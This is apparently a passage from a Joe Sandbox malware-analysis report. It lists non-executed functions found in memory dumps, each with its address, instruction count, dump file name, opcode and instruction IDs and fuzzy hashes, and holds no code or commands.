                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 6842923-0
                                                                                                                                                              • Opcode ID: 33863a4391a2680650613d04effd0227ac2abc36b131055a82df5d93fa1c7af1
                                                                                                                                                              • Instruction ID: 718d586adee1c368c312ac87ee7f735f7b7c14c0158b884b0d01a360f245288f
                                                                                                                                                              • Opcode Fuzzy Hash: 33863a4391a2680650613d04effd0227ac2abc36b131055a82df5d93fa1c7af1
                                                                                                                                                              • Instruction Fuzzy Hash: 51E04632931825DBDF14DF5CECA46ACB735FBA4312F004162D82697440DB31B8A2CB81
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 0329CAD8 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a805285059fa68d8b0022491058d660fb404df9773722a3fb1eb89843d2f0607
                                                                                                                                                              • Instruction ID: 89af7592db42c71d663267b5659775bb2f7d52036f3b5215cd6478678d724fe7
                                                                                                                                                              • Opcode Fuzzy Hash: a805285059fa68d8b0022491058d660fb404df9773722a3fb1eb89843d2f0607
                                                                                                                                                              • Instruction Fuzzy Hash: 4A1290F1C2D74DCAF710CF29E84A1857EA1F745318B507309E2616B2E1DBB8198ACF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03258A10 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 774f68e66ef6801fb4db6f808dbec76aff208b1039b3ee90a2890aafb7d41bee
                                                                                                                                                              • Instruction ID: 0229b2981cbc052ae65aa55d51e2fdb1c347c29ac7a91c00e80a729e9a7422f6
                                                                                                                                                              • Opcode Fuzzy Hash: 774f68e66ef6801fb4db6f808dbec76aff208b1039b3ee90a2890aafb7d41bee
                                                                                                                                                              • Instruction Fuzzy Hash: CE917170F10209DFDB14CFA9C98079DFBF6AF88314F188129E815E7294DBB49985CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03297669 Relevance: .2, Instructions: 236COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 81a3c1e8bc4e57184afc7a16319483fe2a8e9fb46a20cc51abb9508f983146b1
                                                                                                                                                              • Instruction ID: 52aa88a57970783c5d56df4507657e2d66b72c64b1e21b7c4b0cee95fde99ad7
                                                                                                                                                              • Opcode Fuzzy Hash: 81a3c1e8bc4e57184afc7a16319483fe2a8e9fb46a20cc51abb9508f983146b1
                                                                                                                                                              • Instruction Fuzzy Hash: F1A1D774B00209DBDB08DFB5E4A5AAEB772FBD8304F608129D84567394CE79AC41CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03297678 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ccc40f1caa8ce3261e98ee8e3d9f9070fc16f619efb6a082c7c9d0f4e677b7f5
                                                                                                                                                              • Instruction ID: f725571481c1f1f7375547e37d80f90386646f776dbbd0e840bf61f5fcff8210
                                                                                                                                                              • Opcode Fuzzy Hash: ccc40f1caa8ce3261e98ee8e3d9f9070fc16f619efb6a082c7c9d0f4e677b7f5
                                                                                                                                                              • Instruction Fuzzy Hash: 31A1E774B00209DBDB08DFB5E4A5AAEB772FBD8304F608129D84567394CE79AC41CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0329CAC7 Relevance: .2, Instructions: 226COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0fa04c9eda9d8e479b8d10c308337bb531819c739c017f1f7ad7497d87ee65a9
                                                                                                                                                              • Instruction ID: 2dac6235cc3cdb0cc339ac4a1c3ff9f9bd0d52002f28ce88425eded40d9700f2
                                                                                                                                                              • Opcode Fuzzy Hash: 0fa04c9eda9d8e479b8d10c308337bb531819c739c017f1f7ad7497d87ee65a9
                                                                                                                                                              • Instruction Fuzzy Hash: 35C1E4B1C2974DCAE710CF69E84A1897FA1FB85314F507309E2616B2D1DBB8198ACF94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03291D60 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d3f7c33d64a0e4d9898f88d8b6d588553ef4e6b4e4f4a1701171899e80b97cc7
                                                                                                                                                              • Instruction ID: 79406863fd72dbc089526d47f7a3cc1d0b99b5e5d397a1a3bb96df466991062b
                                                                                                                                                              • Opcode Fuzzy Hash: d3f7c33d64a0e4d9898f88d8b6d588553ef4e6b4e4f4a1701171899e80b97cc7
                                                                                                                                                              • Instruction Fuzzy Hash: 5D311770E096458BD729CF7BEC1470ABBE3BBD4204F18D269C404DF268EFB519258B91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 03291D70 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2268c7b5940b14c23b45d35b55a5c6f22a03a907d5f2e2f8013dc3f0292bc24d
                                                                                                                                                              • Instruction ID: c221e1baefcfedf57a4feb7f0ec55642a6e6c9fb6e4f5eb8665b77c16b30827c
                                                                                                                                                              • Opcode Fuzzy Hash: 2268c7b5940b14c23b45d35b55a5c6f22a03a907d5f2e2f8013dc3f0292bc24d
                                                                                                                                                              • Instruction Fuzzy Hash: EE311871E096858BD328CF7BEC5470ABBE3BBD4204F18D269C404DF268EFB514258B91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%